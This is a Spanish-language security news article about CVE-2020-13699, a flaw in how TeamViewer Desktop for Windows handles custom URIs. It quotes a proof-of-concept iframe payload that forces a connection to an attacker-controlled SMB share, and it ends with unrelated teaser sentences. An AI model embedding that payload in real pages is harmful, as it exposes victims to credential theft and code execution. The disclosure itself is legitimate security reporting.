El popular software de soporte remoto TeamViewer ha corregido una falla de alta gravedad en su aplicación de escritorio para Windows. Si se explota, la falla podría permitir a atacantes remotos no autenticados ejecutar código en los sistemas de los usuarios o descifrar sus contraseñas de TeamViewer. TeamViewer es una aplicación de software patentada utilizada por […]
El popular software de soporte remoto TeamViewer ha corregido una falla de alta gravedad en su aplicación de escritorio para Windows. Si se explota, la falla podría permitir a atacantes remotos no autenticados ejecutar código en los sistemas de los usuarios o descifrar sus contraseñas de TeamViewer.
TeamViewer es una aplicación de software patentada utilizada por las empresas para funciones de control remoto, uso compartido de escritorio, reuniones en línea, conferencias web y transferencia de archivos entre computadoras. La falla recientemente descubierta se debe a que la aplicación Desktop para Windows ( CVE-2020-13699 ) no cita correctamente sus controladores de identificador uniforme de recursos (URI) personalizados.
Las aplicaciones deben identificar los URI de los sitios web que se manejan. Pero debido a que las aplicaciones de control pueden recibir datos de fuentes que no son de confianza, los valores de URI que se pasan a la aplicación pueden contener datos maliciosos que intentan explotar la aplicación. En este caso específico, la aplicación no “cita” los valores, lo que significa que TeamViewer los tratará como comandos en lugar de como valores de entrada.
“Un atacante podría incrustar un iframe malicioso en un sitio web con una URL creada (<iframe src = ‘teamviewer10: –play \\ attacker-IP \ share \ fake.tvs’>) que iniciaría el cliente de escritorio de TeamViewer Windows y lo forzaría para abrir un recurso compartido SMB remoto ”, según un aviso de Jeffrey Hofmann, ingeniero de seguridad de Praetorian, quien reveló la falla.
Para iniciar el ataque, el atacante podría simplemente persuadir a una víctima con TeamViewer instalado en su sistema para que haga clic en la URL creada en un sitio web, una oportunidad para que los atacantes lancen ataques potencialmente peligrosos.
Luego, el URI engañará a la aplicación para que cree una conexión con el protocolo de bloque de mensajes de servidor (SMB) remoto controlado por el atacante. SMB es un protocolo de red utilizado por computadoras con Windows que permite a los sistemas dentro de la misma red compartir archivos.
Una serie de vulnerabilidades que afectan a Find My Mobile de Samsung podrían haber provocado la ejecución de actividades maliciosas en los celulares Galaxy, reveló un investigador de Char49 en la conferencia DEF CON .
Una evaluación realizada por la organización con sede en Lyon encontró un “cambio de objetivo significativo” por parte de los delincuentes de individuos y pequeñas empresas a grandes corporaciones, gobiernos e infraestructura crítica.